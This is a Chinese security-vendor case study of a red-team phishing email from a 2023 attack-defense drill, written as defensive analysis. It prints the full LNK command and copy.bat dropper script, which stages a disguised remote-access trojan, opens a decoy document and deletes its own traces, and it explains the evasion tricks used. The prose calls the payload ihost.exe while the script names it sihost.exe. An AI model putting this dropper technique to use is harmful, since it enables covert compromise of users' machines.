【年度典型案例】诡计多端!攻防演练中攻击队的神秘布局
随着网络安全的重要性日益得到重视,网络安全实战攻防演练日益普及,其规模与覆盖面均逐年增长。
在攻防演练中,攻击方非常热衷于通过钓鱼、病毒邮件进行“打点”,利用远控木马获取目标企业员工终端权限,从而打开渗透企业内网的突破口。
真实案例分析
这是2023年某大型网络安全攻防演练中Coremail捕获到的来自攻击队的真实邮件。邮件以员工最关心薪酬通知为话题,引诱用户打开附件。攻击队还注册了近似的域名进行域名仿冒,以迷惑用户。
附件为一个加密压缩包,通过加密的方式防止邮件安全网关反病毒查杀。解压后为一个快捷方式文件和一个隐藏文件夹。
注意!windows lnk文件默认不显示后缀的特性,使其看起来非常像一个doc文档。
用户一旦打开此快捷方式文件,就会执行以下命令:
C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c ".\__M\.DOCX\copy.bat" && exit
命令执行的结果就是运行隐藏文件夹中的 Copy.bat 脚本。Copy.bat脚本执行的内容如下:
cmd /c xcopy /h /y %cd%\__M\.DOCX\DS %temp%\
attrib -s -a -h %temp%\DS
rename %temp%\DS sihost.exe
attrib -s -a -h %cd%\__M\.DOCX\DS
del "%cd%\__M\.DOCX\DS"
attrib -s -a -h %cd%\__M\.DOCX\copy.bat
del *.lnk
copy %cd%\__M\.DOCX\员工工资变动申请表.doc %cd%\员工工资变动申请表.doc
start %cd%\员工工资变动申请表.doc
start %temp%\sihost.exe
del /s /q /f %0
Copy.bat脚本功能是把同文件夹下的DS文件拷贝到临时文件夹并重命名为ihost.exe,并且运行。ihost.exe是最终的恶意载荷,是一个远控木马,也做了免杀处理。运行木马后,bat脚本将删除DS和lnk文件,以清理痕迹,同时打开一个无害的doc文档,以便迷惑用户。
最终用户在完全不知情的情况下被植入了远控木马,攻击者利用远控密码可以持续监听用户口令以及查看用户本地文件。
攻击手法分析
01、话题吸睛
攻击队病毒邮件往往使用“薪酬通知”“安全监测工具”“实名举报”等吸引人的话题,引诱员工打开附件。
02、加密压缩
加密压缩是攻击队最喜欢的免杀方式,这种方式简单有效,可以绕过大部分杀毒引擎的查杀。
03、通过多文件相互调用反沙箱
此案例中的病毒附件由多个文件相互调用,lnk、bat文件均不带有恶意载荷,DS文件运行前没有后缀。攻击队通过这样的组合,使得每个单一文件在沙箱中均不会报毒。
04、多重伪装
结合了近似域名仿冒、lnk文件伪装doc文件、ihost.exe伪装系统进程等多种方式混淆视听,避免被用户察觉。
防护方案
·使用CACTER邮件安全网关的加密附件隔离审核功能,可以有效识别带有加密附件的邮件,可以对加密附件邮件进行隔离和审核。
·使用CACTER邮件安全网关的加密附件深度分析功能,可以从邮件正文智能提取解压口令,对附件进行解压后进一步进行查杀。
·定期开展钓鱼演练,对员工做好安全意识培训,提高员工的安全意识水平。
在网络安全攻防演练中,攻击方的策略和技巧不断演变,使得防御工作充满挑战。通过深入分析攻击手法并采取有效的防护措施,可以提高企业的网络安全防护能力。